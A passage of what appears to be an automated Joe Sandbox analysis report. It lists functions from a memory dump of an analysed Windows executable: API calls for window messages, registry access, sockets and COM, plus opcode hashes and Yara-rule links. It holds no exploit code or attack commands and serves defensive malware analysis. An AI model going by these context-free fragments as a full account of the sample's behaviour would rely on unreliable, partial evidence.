                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E278CF
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EB4BB0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EB4BBD
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EB4BC8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EB4BD7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EB4BE3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                                    • Opcode ID: 856ef38ff8e71614ea7f04466f7b4ca5579ee017d27c9a3887343869f3988847
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5ca89edea8ee2e009b158444b59efb04132afb0c83ec1e731a496be250f35dc9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 856ef38ff8e71614ea7f04466f7b4ca5579ee017d27c9a3887343869f3988847
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 251193B214021DBEEF118EA5CC85EE77F9DEF08798F015111B748A20A0CA71DC21DBA0
                                                                                                                                                                                                                                                                                                    Function 00E86078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _memcmp
                                                                                                                                                                                                                                                                                                    • String ID: j`
                                                                                                                                                                                                                                                                                                    • API String ID: 2931989736-1521845545
                                                                                                                                                                                                                                                                                                    • Opcode ID: 844eeb37c7893dee2191e546922f9031124b3e88d7f0891a5ea5fb3c53f44386
                                                                                                                                                                                                                                                                                                    • Instruction ID: cb0ca8b0627cc2ff7acca8bc27f7012308e338df976cb94ad3a60cffdb431e8e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 844eeb37c7893dee2191e546922f9031124b3e88d7f0891a5ea5fb3c53f44386
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC018DF1640705BBD724B6119D42FABB35D9E5139CF006029FD0DBB242E762ED51C3A5
                                                                                                                                                                                                                                                                                                    Function 00E8E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E8E328
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00E8E32F
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E8E345
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00E8E34C
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E8E390
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00E8E36D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                                    • Opcode ID: b6ab2127e82d0d2f3baa0f13e9ca15089525fdc2b47db2c7980c9c4315924468
                                                                                                                                                                                                                                                                                                    • Instruction ID: eb6f534636aefbb8ca28275dec3f70fcb336199bed1dc7d718967f1328e0b5ee
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6ab2127e82d0d2f3baa0f13e9ca15089525fdc2b47db2c7980c9c4315924468
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD0136F690420CBFE751A7A59D89EE7776CD708300F0046A2B749F6041F6749E884B75
                                                                                                                                                                                                                                                                                                    Function 00E91312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00E91322
                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?), ref: 00E91334
                                                                                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 00E91342
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00E91350
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E9135F
                                                                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E9136F
                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00E91376
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 372d864cd6f5dcd88e5e42af21ba14af940490ccc7cf45f0e892c91846e3e712
                                                                                                                                                                                                                                                                                                    • Instruction ID: 20cc41ef1e1111a7c2de7eab761e4eb51e35731284cf3820fd100688725e8673
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 372d864cd6f5dcd88e5e42af21ba14af940490ccc7cf45f0e892c91846e3e712
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0EC3204A612BFD7455B95EE49BD7BB39FF04306F402221F101A18B097749479CF90
                                                                                                                                                                                                                                                                                                    Function 00EA26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00EA281D
                                                                                                                                                                                                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EA283E
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00EA284F
                                                                                                                                                                                                                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00EA2938
                                                                                                                                                                                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00EA28E9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8433E: _strlen.LIBCMT ref: 00E84348
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00E9F669), ref: 00EA3C9D
                                                                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 00EA2992
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c867a912f6dab0972e1abd66ba0d26586f8f94e7ab456ae1bf315a70c9ab99c9
                                                                                                                                                                                                                                                                                                    • Instruction ID: e4e40b10e623afd87fc170e10350c33bab467de7146eac58973836df0ecc12f7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c867a912f6dab0972e1abd66ba0d26586f8f94e7ab456ae1bf315a70c9ab99c9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07B1E231604300AFD324DF28D885E2ABBE5AF89318F54A54CF5567F2A2DB31EE45CB91
                                                                                                                                                                                                                                                                                                    Function 00E50527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00E5042A
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E50446
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00E5045D
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E5047B
                                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00E50492
                                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E504B0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                    • Instruction ID: cc859737254c3227c65db1295418a814fc561912607e7b0f08367c11124da7d7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A811A72600B069BD720AF79DC41B6E73E9AF44725F24692EFD21F7281E770D9088794
                                                                                                                                                                                                                                                                                                    Function 00E56571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E48649,00E48649,?,?,?,00E567C2,00000001,00000001,00000000), ref: 00E565CB
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E567C2,00000001,00000001,00000000,?,?,?), ref: 00E56651
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E5674B
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E56758
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E46A79,?,0000015D,?,?,?,?,00E485B0,000000FF,00000000,?,?), ref: 00E53BC5
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E56761
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E56786
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8687c52f949df48c80b407b1ff79ea318e3944b8eefb59e609d0fff8ae75ff06
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8ec32be9763030c84ddefa0cea2c46391aca9b256b939d194764b0044db162cd
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8687c52f949df48c80b407b1ff79ea318e3944b8eefb59e609d0fff8ae75ff06
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4512772600206AFDB258F64CC81EBF77AAEB48759F541A6AFC04F7140EB74DC58C6A0
                                                                                                                                                                                                                                                                                                    Function 00EAC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EAC10E,?,?), ref: 00EAD415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EAC72A
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EAC785
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EAC7CA
                                                                                                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EAC7F9
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EAC853
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00EAC85F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6c51f5581f4159352112fe654f5fc2ae91cf02227fcb12d04079919850d98c53
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9649cc9a5c6048174cf7e3737e57e6eff9e7d55d93cebd67052f9ab3ee502aa1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c51f5581f4159352112fe654f5fc2ae91cf02227fcb12d04079919850d98c53
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F581AE71208241AFD714DF24C885E2ABBE5FF89308F1495ADF0596B2A2DB31FD45CB92
                                                                                                                                                                                                                                                                                                    Function 00E8009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 00E800A9
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00E80150
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(00E80354,00000000), ref: 00E80179
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(00E80354), ref: 00E8019D
                                                                                                                                                                                                                                                                                                    • VariantCopy.OLEAUT32(00E80354,00000000), ref: 00E801A1
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00E801AB
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: d9d1a85406689f50150b61050f7508885721a90adbd22b817bda905595f423d7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 21fb645c5bb5fb2b475a2a75fc1087b56c7fc65397a51b4fa3710172c00d7846
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9d1a85406689f50150b61050f7508885721a90adbd22b817bda905595f423d7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4851EB31600310AADFA0BB649889B69B3E5EF45310F14B446E90EFF2A7DBB09C48C755
                                                                                                                                                                                                                                                                                                    Function 00E99B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E241EA: _wcslen.LIBCMT ref: 00E241EF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00E99F2A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E99F4B
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E99F72
                                                                                                                                                                                                                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00E99FCA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                                                    • String ID: X
                                                                                                                                                                                                                                                                                                    • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                                                    • Opcode ID: f28e21a92116431504b136f9bd8d03a8ac8942303ded6b4b4414fb9d905096c5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 99e18d640ec80e1713deef1578b0bc0cdadfa8770fd7fdc42d18856357b6879a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f28e21a92116431504b136f9bd8d03a8ac8942303ded6b4b4414fb9d905096c5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68E195316043509FDB24DF28D881B6AB7E1FF84314F14956DF889AB2A2DB31DD45CB92
                                                                                                                                                                                                                                                                                                    Function 00E96ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E96F21
                                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00E9707E
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00EC0CC4,00000000,00000001,00EC0B34,?), ref: 00E97095
                                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00E97319
